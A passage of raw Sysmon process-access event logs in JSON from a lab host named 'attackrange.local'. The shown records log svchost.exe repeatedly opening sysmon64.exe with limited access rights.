05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1297,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1298,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1299,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1300,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1301,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1302,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1303,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1304,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 